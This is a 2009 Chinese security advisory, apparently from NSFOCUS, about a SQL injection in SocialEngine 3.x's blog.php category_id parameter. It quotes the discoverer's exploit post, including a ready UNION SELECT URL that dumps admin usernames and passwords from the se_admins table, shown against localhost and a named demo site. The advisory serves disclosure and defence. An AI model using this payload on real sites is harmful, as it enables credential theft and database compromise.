安全研究

安全漏洞
SocialEngine category_id SQL注入漏洞

发布日期:2009-01-29
更新日期:2009-01-30

受影响系统:
Webligo Developments SocialEngine 3.x
描述:
SocialEngine是基于PHP的社会网络平台,允许在网站上创建社会网络。

SocialEngine的Blog功能实现上存在输入验证漏洞,远程攻击者可能利用此漏洞非授权访问操作数据库。

SocialEngine的blog.php脚本没有正确地过滤对category_id参数所传送的输入便用在了SQL查询中,远程攻击者可以通过提交恶意请求执行SQL注入攻击。安装了Blog插件的SocialEngine系统受此漏洞影响。

<*来源:Snakespc
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

==================================================================================================================
=         SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM            =
=         S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M            =      
+         SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M            +      
=             S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M            =      
=         SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M            =
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=                               Social Engine (blog.php) SQL Injection Vulnerability                                +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =          Discovered By: Snakespc  :::ALGERIAN HaCkEr:::               =     =  
                =                                                                                    =
                                    :::::Mail: snakespc@gmail.com:::::::            
                =                                                                                    =                                                                                  
                =            http://www.socialengine.net/demos.php  "blog.php"                       =
                  ===================================GAZA=============================================

Exploit:
http://localhost/blog.php?user=darkthronex&category_id=-5+UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins/*
********
demo:
http://www.socialenginedev.com/blog.php?user=darkthronex&category_id=-5+UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins/*
============================================================== ALLAH AKBAR=========================================================

Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: SuB-ZeRo
ALL www.SnakespC.com/sc >>>>dz-security.net >>>> Members
Str0ke ....Milw0rm
=====================================================GAZA=========================================================================

建议:
厂商补丁:

Webligo Developments
--------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.socialengine.net/

浏览次数:3321
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障